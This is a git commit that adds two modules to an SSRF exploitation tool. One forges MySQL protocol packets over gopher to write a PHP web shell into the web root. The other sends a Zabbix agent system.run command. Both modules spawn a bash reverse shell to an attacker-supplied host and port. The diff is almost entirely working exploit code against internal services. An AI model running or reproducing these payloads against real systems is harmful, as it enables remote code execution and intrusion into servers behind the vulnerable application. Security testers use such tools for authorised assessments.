MODULE - MySQL and Zabbix services

2018-10-16 21:34:04 +02:00 · 2018-10-16 21:34:04 +02:00 · 59f3d27a15
parent eec61482bb
commit 59f3d27a15
3 changed files with 110 additions and 0 deletions
--- a/modules/mysql.py
+++ b/modules/mysql.py
@ -0,0 +1,75 @@
+from core.utils import *
+import logging
+import binascii
+
+name        = "mysql"
+description = "Execute MySQL command < 8.0"
+author      = "Swissky"
+
+# Documentation
+# https://spyclub.tech/2018/ssrf-through-gopher/
+# https://github.com/eboda/34c3ctf/tree/master/extract0r
+# https://infosec.rm-it.de/2018/07/29/isitdtu-ctf-2018-friss/
+
+# Note
+# This exploit is a Python 3 version of the Gopherus tool
+
+class exploit():
+    user  = "root"
+    query = "select \"<?php system('bash -i >& /dev/tcp/SERVER_HOST/SERVER_PORT 0>&1'); ?>\" INTO OUTFILE '/var/www/html/shell.php'"
+
+    def __init__(self, requester, args):
+        logging.info("Module '{}' launched !".format(name))
+
+        self.user = input("Give MySQL username: ")
+        encode_user = binascii.hexlify( self.user.encode() )
+        user_length = len(self.user)
+        temp   = user_length - 4
+        length = '{:x}'.format(0xa3 + temp)
+
+        dump  = length+ "00000185a6ff0100000001210000000000000000000000000000000000000000000000"
+        dump += encode_user.decode()
+        dump += "00006d7973716c5f6e61746976655f70617373776f72640066035f6f73054c696e75780c5f636c69656e745f6e616d65086c"
+        dump += "69626d7973716c045f7069640532373235350f5f636c69656e745f76657273696f6e06352e372e3232095f706c6174666f726d"
+        dump += "067838365f36340c70726f6772616d5f6e616d65056d7973716c"
+
+        query = input("Give query to execute (Enter for Reverse Shell): ")
+        if query == "":
+            if args.lhost == None: 
+                self.query = self.query.replace("SERVER_HOST", input("Server Host:"))
+            else:
+                self.query = self.query.replace("SERVER_HOST", args.lhost)
+
+            if args.lport == None: 
+                self.query = self.query.replace("SERVER_PORT", input("Server Port:"))
+            else:
+                self.query = self.query.replace("SERVER_PORT", args.lport)
+        else:
+            self.query  = query
+        
+
+        auth = dump.replace("\n","")
+        payload = self.get_payload(self.query, auth)
+        logging.info("Generated payload : {}".format(payload))
+
+        r1 = requester.do_request(args.param, payload)
+        r2 = requester.do_request(args.param, "")
+        if r1 != None and r2!= None:
+            diff = diff_text(r1.text, r2.text)
+            print(diff)
+
+
+    def encode(self, s):
+        a = [s[i:i + 2] for i in range(0, len(s), 2)]
+        return wrapper_gopher("%".join(a), "127.0.0.1", "3306")
+
+
+    def get_payload(self, query, auth):
+        if(query.strip()!=''):
+        	query = binascii.hexlify( query.encode() )
+        	query_length = '{:x}'.format((int((len(query) / 2) + 1)))
+        	pay1 = query_length.rjust(2,'0') + "00000003" + query.decode()
+        	final = self.encode(auth + pay1 + "0100000001")
+        	return final
+        else:
+    	    return self.encode(auth)
--- a/modules/zabbix.py
+++ b/modules/zabbix.py
@ -0,0 +1,35 @@
+from core.utils import *
+import logging
+import urllib.parse as urllib
+
+name        = "zabbix"
+description = "Zabbix RCE"
+author      = "Swissky"
+
+class exploit():
+
+    def __init__(self, requester, args):
+        logging.info("Module '{}' launched !".format(name))
+
+        # Data for the service
+        ip   = "127.0.0.1"
+        port = "10050"
+        cmd = "bash -i >& /dev/tcp/SERVER_HOST/SERVER_PORT 0>&1"
+        cmd = urllib.quote_plus(cmd).replace("+","%20")
+        cmd = cmd.replace("%2F","/")
+        cmd = cmd.replace("%25","%")
+        cmd = cmd.replace("%3A",":")
+        data = "system.run[(" + cmd + ");sleep 2s]"
+
+        # Handle args for reverse shell
+        if args.lhost == None: data = data.replace("SERVER_HOST", input("Server Host:"))
+        else:                  data = data.replace("SERVER_HOST", args.lhost)
+
+        if args.lport == None: data = data.replace("SERVER_PORT", input("Server Port:"))
+        else:                  data = data.replace("SERVER_PORT", args.lport)
+        
+        payload = wrapper_gopher(data, ip , port)
+        logging.info("Generated payload : {}".format(payload))
+
+        # Send the payload
+        r = requester.do_request(args.param, payload)
--- a/screenshot/readfiles_example_ssrf_1.png
+++ b/screenshot/readfiles_example_ssrf_1.png